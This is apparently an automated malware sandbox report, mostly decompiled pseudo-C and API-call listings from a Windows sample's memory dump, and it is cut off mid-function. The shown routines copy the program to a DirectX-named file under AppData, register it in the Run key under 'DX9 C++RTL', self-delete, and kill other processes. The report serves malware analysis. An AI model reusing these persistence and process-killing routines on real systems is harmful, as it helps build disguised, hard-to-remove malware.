      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
